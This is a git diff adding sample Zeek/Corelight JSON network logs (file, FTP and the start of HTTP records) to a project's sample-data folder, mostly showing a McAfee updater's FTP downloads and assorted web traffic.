+{"ts":"2018-08-03T23:37:54.505930Z","fuid":"F4GX2RtQJpw0gNiM6","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CBL1Td2bbLXrtHnMDi"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":16060,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505930Z","fuid":"F11BAD4h1LBEu8taQc","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cl69D34wuvQ4VCJVwh"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505930Z","fuid":"FKxCi93SlQpKjckWB2","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CtkRsV1BkVq1YXxVYj"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":2920,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.662917Z","fuid":"FigtOa4nf5M7l0Xxif","tx_hosts":["216.58.209.98"],"rx_hosts":["192.168.0.51"],"conn_uids":["ChmZin2myC0riHObNf"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.465166Z","fuid":"FUQJzC21dA8ytj67ng","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Ckkc0y1Ol4cTbkliig"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.465166Z","fuid":"FXCwN63GTCJyo4k497","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["Cykshb18EWtqGpfLpi"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":13140,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.475260Z","fuid":"FWuotc3TiM8ZRwa2gd","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CMIMXTgvoy5nkp4id"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.475260Z","fuid":"F87ocbyf5wG2MkVV","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CdQTTJ1e5FOHhHxnW1"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1460,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505654Z","fuid":"FmirqR32jAAG5BYZgh","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["C601KhTnxc5CyCcFg"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.505654Z","fuid":"FM8VwBJWXUGMoQqJk","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CbNU0845nPmqUznHSk"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4380,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.515779Z","fuid":"Fom50h3WL8YigGBTol","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CPaKhq4VN4DNyLFXX5"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":14600,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.530971Z","fuid":"Fuc7NA19YUUGTobLGj","tx_hosts":["192.168.0.1"],"rx_hosts":["192.168.0.51"],"conn_uids":["CoxUaQ1AlkSjY7ovD1"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":12572,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:54.657418Z","fuid":"F9fjZE2KFSG5rWHwIf","tx_hosts":["216.58.209.98"],"rx_hosts":["192.168.0.51"],"conn_uids":["CNX6HJ3QcSjranr9r"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":60653,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.554531Z","fuid":"FsCsLi1vxzM2ieSRid","tx_hosts":["72.52.91.14"],"rx_hosts":["192.168.0.51"],"conn_uids":["CZ1tIN311Rr6VW9u7k"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":121876,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.530941Z","fuid":"FBpUTm2tTdsdzDlb25","tx_hosts":["192.168.0.2"],"rx_hosts":["128.61.240.66"],"conn_uids":["CwySWN3WfgmQUI9cN7"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.487331Z","fuid":"FIahxR3DytFfCDaX0j","tx_hosts":["192.168.0.2"],"rx_hosts":["93.184.220.29"],"conn_uids":["CnuFq74T1P6oZRgPqk"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":true,"seen_bytes":0,"missing_bytes":465,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.557289Z","fuid":"FlDb3YoIpaP9Toyc4","tx_hosts":["72.52.91.14"],"rx_hosts":["192.168.0.51"],"conn_uids":["CYDmWB34nHmdOXzXQ8"],"source":"HTTP","depth":0,"analyzers":["SHA256","MD5","SHA1"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":44692,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.210749Z","fuid":"FCFk534jSanLgTUIK9","tx_hosts":["192.168.0.54"],"rx_hosts":["192.168.0.1"],"conn_uids":["CIhf2A1eM0sO4ZVyEl"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":true,"is_orig":true,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.559949Z","fuid":"F8lKOuRdzAwivoOYb","tx_hosts":["72.52.91.14"],"rx_hosts":["192.168.0.51"],"conn_uids":["CiDL9R1tDpuUZ2mU4h"],"source":"HTTP","depth":0,"analyzers":["SHA1","SHA256","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":16516,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.563090Z","fuid":"FWM9XD1OkYpyYNS7Nh","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.146"],"conn_uids":["CpbMRO2vFC64HiL9na"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":71644,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.573188Z","fuid":"FcmNZx1JYgbvul8Sjl","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.146"],"conn_uids":["C3XKFg33c48ee5EtX5"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":4643,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.476893Z","fuid":"FJtflHVMljMnwuXQl","tx_hosts":["93.184.220.29"],"rx_hosts":["192.168.0.2"],"conn_uids":["CArZ6s3o464GaJTg7b"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":788,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.552833Z","fuid":"FWVJ1GDbhVz2aBpmh","tx_hosts":["72.52.91.14"],"rx_hosts":["192.168.0.51"],"conn_uids":["CdvgcM26CxCaCwmL4b"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.563011Z","fuid":"FzMvQhlL2FQNwbt3l","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.146"],"conn_uids":["CMen3q2ZwVS3r1XPrj"],"source":"HTTP","depth":0,"analyzers":["SHA256","SHA1","MD5"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":11363,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.553330Z","fuid":"FlwmUy2bApwnWGkpYc","tx_hosts":["192.168.0.2"],"rx_hosts":["217.195.49.146"],"conn_uids":["CRdU7myRHW1Lmn5U3"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:55.553330Z","fuid":"FXALax1SNy4ie6rAUh","tx_hosts":["217.195.49.146"],"rx_hosts":["192.168.0.2"],"conn_uids":["CRdU7myRHW1Lmn5U3"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA256","SHA1"],"duration":0.0,"local_orig":false,"is_orig":true,"seen_bytes":0,"missing_bytes":1,"overflow_bytes":0,"timedout":true} +{"ts":"2018-08-03T23:37:56.699118Z","fuid":"FkgQNz2dye4VOjihZi","tx_hosts":["192.168.0.2"],"rx_hosts":["37.48.81.52"],"conn_uids":["CLErWp4pCb5euqBBK7"],"source":"HTTP","depth":0,"analyzers":["MD5","SHA1","SHA256"],"duration":0.0,"local_orig":true,"is_orig":false,"seen_bytes":0,"missing_bytes":81740,"overflow_bytes":0,"timedout":true} diff --git a/Sample Data/Custom/Corelight/ftp_20180803_16:37:54-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/ftp_20180803_16:37:54-16:40:00-0700.log_ new file mode 100644 index 0000000000..a5307edf64 --- /dev/null +++ b/Sample Data/Custom/Corelight/ftp_20180803_16:37:54-16:40:00-0700.log_ @@ -0,0 +1,41 @@ +{"ts":"2018-08-03T23:37:54.727658Z","uid":"CDf2ax38t1CT4KmNE1","id.orig_h":"192.168.0.54","id.orig_p":50650,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.727658Z","uid":"CDf2ax38t1CT4KmNE1","id.orig_h":"192.168.0.54","id.orig_p":50650,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,200,46)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":51246} +{"ts":"2018-08-03T23:37:54.727658Z","uid":"CDf2ax38t1CT4KmNE1","id.orig_h":"192.168.0.54","id.orig_p":50650,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/SiteStat.xml","file_size":118,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.729893Z","uid":"C76s953QxhGJN0Iufj","id.orig_h":"192.168.0.54","id.orig_p":50645,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.729893Z","uid":"C76s953QxhGJN0Iufj","id.orig_h":"192.168.0.54","id.orig_p":50645,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,222,132)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":56964} +{"ts":"2018-08-03T23:37:54.729893Z","uid":"C76s953QxhGJN0Iufj","id.orig_h":"192.168.0.54","id.orig_p":50645,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/catalog.z","file_size":5364,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.730781Z","uid":"C9RQtm1GBPSByhhu76","id.orig_h":"192.168.0.54","id.orig_p":50647,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.730781Z","uid":"C9RQtm1GBPSByhhu76","id.orig_h":"192.168.0.54","id.orig_p":50647,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,218,56)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":55864} +{"ts":"2018-08-03T23:37:54.730781Z","uid":"C9RQtm1GBPSByhhu76","id.orig_h":"192.168.0.54","id.orig_p":50647,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/catalog.z","file_size":5364,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.730781Z","uid":"Ca9OPc19vjxRXcGcil","id.orig_h":"192.168.0.54","id.orig_p":50662,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.730781Z","uid":"Ca9OPc19vjxRXcGcil","id.orig_h":"192.168.0.54","id.orig_p":50662,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,146,208)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":37584} +{"ts":"2018-08-03T23:37:54.730781Z","uid":"Ca9OPc19vjxRXcGcil","id.orig_h":"192.168.0.54","id.orig_p":50662,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/Current/VSCANDAT1000/DAT/0000/PkgCatalog.z","file_size":3804,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.727367Z","uid":"CR7Rsx2JMpflvBoJN","id.orig_h":"192.168.0.54","id.orig_p":50665,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.727367Z","uid":"CR7Rsx2JMpflvBoJN","id.orig_h":"192.168.0.54","id.orig_p":50665,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,196,20)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":50196} +{"ts":"2018-08-03T23:37:54.727367Z","uid":"CR7Rsx2JMpflvBoJN","id.orig_h":"192.168.0.54","id.orig_p":50665,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/Current/VSCANDAT1000/DAT/0000/V2datinstall.mcs","file_size":88252,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.727367Z","uid":"CmIPJE421kLrnzFZg4","id.orig_h":"192.168.0.54","id.orig_p":50668,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.727367Z","uid":"CmIPJE421kLrnzFZg4","id.orig_h":"192.168.0.54","id.orig_p":50668,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,185,243)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":47603} +{"ts":"2018-08-03T23:37:54.727367Z","uid":"CmIPJE421kLrnzFZg4","id.orig_h":"192.168.0.54","id.orig_p":50668,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/Current/VSCANDAT1000/DAT/0000/gdeltaavv.ini","file_size":2315,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.728778Z","uid":"Cgum5CkGntrLLTXAj","id.orig_h":"192.168.0.54","id.orig_p":50659,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.728778Z","uid":"Cgum5CkGntrLLTXAj","id.orig_h":"192.168.0.54","id.orig_p":50659,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,191,158)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":49054} +{"ts":"2018-08-03T23:37:54.728778Z","uid":"Cgum5CkGntrLLTXAj","id.orig_h":"192.168.0.54","id.orig_p":50659,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/Current/VSCANDAT1000/DAT/0000/PkgCatalog.z","file_size":3804,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.727518Z","uid":"CaDeq02jM2c8uLAAS3","id.orig_h":"192.168.0.54","id.orig_p":50653,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.727518Z","uid":"CaDeq02jM2c8uLAAS3","id.orig_h":"192.168.0.54","id.orig_p":50653,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,175,151)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":44951} +{"ts":"2018-08-03T23:37:54.727518Z","uid":"CaDeq02jM2c8uLAAS3","id.orig_h":"192.168.0.54","id.orig_p":50653,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/catalog.z","file_size":5364,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.727518Z","uid":"C6SSYH1oD0tEFxjIDg","id.orig_h":"192.168.0.54","id.orig_p":50656,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.727518Z","uid":"C6SSYH1oD0tEFxjIDg","id.orig_h":"192.168.0.54","id.orig_p":50656,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,253,73)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":64841} +{"ts":"2018-08-03T23:37:54.727518Z","uid":"C6SSYH1oD0tEFxjIDg","id.orig_h":"192.168.0.54","id.orig_p":50656,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/Current/VSCANENG1000/Engine/0000/PkgCatalog.z","file_size":2292,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.727368Z","uid":"CKcKW44TrEhJ791MPd","id.orig_h":"192.168.0.54","id.orig_p":50671,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.727368Z","uid":"CKcKW44TrEhJ791MPd","id.orig_h":"192.168.0.54","id.orig_p":50671,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,207,202)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":53194} +{"ts":"2018-08-03T23:37:54.727368Z","uid":"CKcKW44TrEhJ791MPd","id.orig_h":"192.168.0.54","id.orig_p":50671,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/Current/VSCANDAT1000/DAT/0000/77357736avv.gem","file_size":440388,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.728258Z","uid":"CKcWml2DANiZ6nt7Xl","id.orig_h":"192.168.0.54","id.orig_p":50642,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"EPSV","reply_code":500,"reply_msg":"Command not supported."} +{"ts":"2018-08-03T23:37:54.728258Z","uid":"CKcWml2DANiZ6nt7Xl","id.orig_h":"192.168.0.54","id.orig_p":50642,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"PASV","reply_code":227,"reply_msg":"Entering Passive Mode. (77,67,22,165,195,204)","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":50124} +{"ts":"2018-08-03T23:37:54.728258Z","uid":"CKcWml2DANiZ6nt7Xl","id.orig_h":"192.168.0.54","id.orig_p":50642,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"anonymous","password":"CommonUpdater%40McAfeeB2B.com","command":"RETR","arg":"ftp://77.67.22.165/CommonUpdater/SiteStat.xml","file_size":118,"reply_code":226,"reply_msg":"Transfer Complete"} +{"ts":"2018-08-03T23:37:54.728258Z","uid":"CnFSLb4aP55YkNP2qc","id.orig_h":"192.168.0.54","id.orig_p":50677,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"","command":"PASV","reply_code":213,"reply_msg":"1436","data_channel.passive":true,"data_channel.orig_h":"192.168.0.54","data_channel.resp_h":"77.67.22.165","data_channel.resp_p":55634} +{"ts":"2018-08-03T23:37:54.728258Z","uid":"CnFSLb4aP55YkNP2qc","id.orig_h":"192.168.0.54","id.orig_p":50677,"id.resp_h":"77.67.22.165","id.resp_p":21,"user":"","command":"RETR","arg":"ftp://77.67.22.165/./BOCVSE__1000/BOCVSE__1000/PkgCatalog.z","reply_code":213,"reply_msg":"1436"} +{"ts":"2018-08-03T23:39:01.305873Z","uid":"CjqVGPVXXCE13mZEi","id.orig_h":"10.0.0.11","id.orig_p":43073,"id.resp_h":"119.74.138.214","id.resp_p":21,"user":"1","password":"","command":"PORT","arg":"10,0,0,11,249,214","reply_code":200,"reply_msg":"Port command successful","data_channel.passive":false,"data_channel.orig_h":"119.74.138.214","data_channel.resp_h":"10.0.0.11","data_channel.resp_p":63958} +{"ts":"2018-08-03T23:39:01.305873Z","uid":"CjqVGPVXXCE13mZEi","id.orig_h":"10.0.0.11","id.orig_p":43073,"id.resp_h":"119.74.138.214","id.resp_p":21,"user":"1","password":"","command":"RETR","arg":"ftp://119.74.138.214/doc.exe","file_size":0,"reply_code":226,"reply_msg":"Transfer OK"} +{"ts":"2018-08-03T23:39:01.306900Z","uid":"CbmdWd4gP4unkau5rj","id.orig_h":"10.0.0.11","id.orig_p":45831,"id.resp_h":"119.74.138.214","id.resp_p":21,"user":"1","password":"","command":"PORT","arg":"10,0,0,11,249,29","reply_code":200,"reply_msg":"Port command successful","data_channel.passive":false,"data_channel.orig_h":"119.74.138.214","data_channel.resp_h":"10.0.0.11","data_channel.resp_p":63773} +{"ts":"2018-08-03T23:39:01.306900Z","uid":"CbmdWd4gP4unkau5rj","id.orig_h":"10.0.0.11","id.orig_p":45831,"id.resp_h":"119.74.138.214","id.resp_p":21,"user":"1","password":"","command":"RETR","arg":"ftp://119.74.138.214/doc.exe","file_size":0,"reply_code":226,"reply_msg":"Transfer OK"} +{"ts":"2018-08-03T23:39:01.313522Z","uid":"CBEYYM9tj0f5jXsM5","id.orig_h":"10.0.0.11","id.orig_p":56724,"id.resp_h":"119.74.138.214","id.resp_p":21,"user":"1","password":"","command":"PORT","arg":"10,0,0,11,248,143","reply_code":200,"reply_msg":"Port command successful","data_channel.passive":false,"data_channel.orig_h":"119.74.138.214","data_channel.resp_h":"10.0.0.11","data_channel.resp_p":63631} +{"ts":"2018-08-03T23:39:01.313522Z","uid":"CBEYYM9tj0f5jXsM5","id.orig_h":"10.0.0.11","id.orig_p":56724,"id.resp_h":"119.74.138.214","id.resp_p":21,"user":"1","password":"","command":"RETR","arg":"ftp://119.74.138.214/doc.exe","file_size":0,"reply_code":226,"reply_msg":"Transfer OK"} diff --git a/Sample Data/Custom/Corelight/http_20180803_16:37:08-16:40:00-0800.log_ b/Sample Data/Custom/Corelight/http_20180803_16:37:08-16:40:00-0800.log_ new file mode 100644 index 0000000000..6b0a1cd560 --- /dev/null +++ b/Sample Data/Custom/Corelight/http_20180803_16:37:08-16:40:00-0800.log_ @@ -0,0 +1,200 @@ +{"ts":"2018-08-03T23:39:01.096578Z","uid":"CScpaf3kDEsPg0jN9i","id.orig_h":"192.168.0.51","id.orig_p":45480,"id.resp_h":"216.58.209.132","id.resp_p":80,"trans_depth":1,"method":"GET","host":"www.google.com","uri":"/recaptcha/api/reload?c=03AHJ_VuuqnzCZy3rwd-j_VyW_gAOSnaqai1-5jO_wwJczQSa7tjy4iB8B6PIT7LV5e4GqtBC0gpcPc49Q0yv62Cl4TBc6qk1quceeAqFSKa3kIo0Bfu0xrlkzknb1JtW0ntno5pIe9WpNhvHAn_On-krRCKehN-7qLdpDJAZq3loy25wYXROOach3zwNoZ14zd0HuLOX48PWwBt2SPFD_T2q4TErzBCf7Shnng5eqcfFClIMB_wGQiUIjtskofd3ytHGp0jkVOBGnJrecUGwjYTi5uvwhRgvizA\u0026k=6LdzYN4SAAAAAEZIKBG_PKLJlSAaMBMeODFH2jxE\u0026reason=t\u0026type=image\u0026lang=sv\u0026th=,9waw0d79G94tC0y2WwlwZY4S2v3wAAAAEaAAAAAE2AC7_t7PdnOf4Z9QkDZHo-S7UyNllxAf-gkllmYq0Ze7aG8nM4iSBCAwrJGjU6dtE02_cDukcEwjqPGZA5zaNif4zgM95JRVJt0_9ZJi4vrjmJyS-vl48D5iJ8oryXuxig-IDjK-STnzYu3-Nubv0fZ5zxrnicG0iQaGmFSbvJ2uXlQg2n3D7bUUVlmvrCQ6c6UOe2hyPrkUC7OZMhxJiP89dKK3rZSj9gEhxij72rQ3gJTIrPynqTdaP